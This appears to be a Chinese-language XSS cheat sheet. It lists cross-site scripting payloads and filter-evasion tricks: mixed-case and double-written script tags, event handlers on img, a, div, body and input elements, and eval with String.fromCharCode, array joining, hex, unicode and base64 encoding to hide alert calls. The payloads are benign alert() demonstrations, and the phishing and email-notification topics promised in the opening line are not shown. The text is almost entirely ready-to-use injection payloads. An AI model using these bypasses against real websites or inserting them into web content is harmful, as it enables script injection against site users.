不讲原理,主要从绕过方法、常见 fishing 语句的分析、设置邮箱通知等方面展开
<script>alert('xss')</script> |
# 绕过方法
# 大小写绕过
<sCriPT>alert('xss')</sCrIPT>
# 双写绕过
<scrscriptipt>alert('xss')</scrscriptipt>
# 切换其他标签
script 禁用的话,可以使用别的标签:<a,onmouseover,onmouseout,onmousemove,onclick...
<img>
<img src='zzzz' onerror='alert(1)' /> |
<a>
<!-- 鼠标悬停触发 --> | |
<a onmouseover="alert('XSS')">悬停触发</a> | |
<!-- 点击触发 --> | |
<a onclick="alert('XSS')">点击触发</a> | |
<!-- 鼠标移出触发 --> | |
<a onmouseout="alert('XSS')">移出触发</a> |
<div>
<!-- 鼠标悬停触发 --> | |
<div onmouseover="alert('XSS攻击!')">悬停此区域</div> | |
<!-- 点击触发 --> | |
<div onclick="alert('XSS攻击!')">点击此区域</div> |
<body>
<body onload="alert('XSS')" | |
onunload="alert('XSS')" | |
onhashchange="alert('XSS')"> |
<input>
<input type="text" onfocus="alert('XSS')" /> | |
<input type="text" onblur="alert('XSS')" /> | |
<input type="image" onerror="alert('XSS')" /> |
# 编码绕过函数禁用
如果类似 alert 这样的函数被禁用,可以使用 js 的 eval 和 String.fromCharCode() ,来进行绕过
# String.fromCharCode () 使用
String.fromCharCode () 用静态方法返回从指定的 UTF-16 代码单元序列创建的字符串。
String.fromCharCode(65, 66, 67); // returns "ABC" | |
String.fromCharCode(0x2014); // returns "—" | |
String.fromCharCode(0x12014); //also returns "—"; 数字 1 被截断或忽略 | |
String.fromCharCode(8212); //also returns "—"; 8212 是十进制的 0x2014 |
String.fromCharCode () 绕过:
<script> | |
eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41)) | |
</script> |
数组连接绕过:
<script> | |
eval(['al','ert'].join('')+'("XSS")') | |
</script> |
UTF8 编码绕过
<script> | |
eval('\x61\x6c\x65\x72\x74\x28\x27\x58\x53\x53\x27\x29') | |
</script> |
Unicode 编码绕过
<script> | |
eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0027\u0058\u0053\u0053\u0027\u0029') | |
</script> |
base64 编码绕过:
<script> | |
eval(atob('YWxlcnQoJ1hTUycp')) | |
</script> |
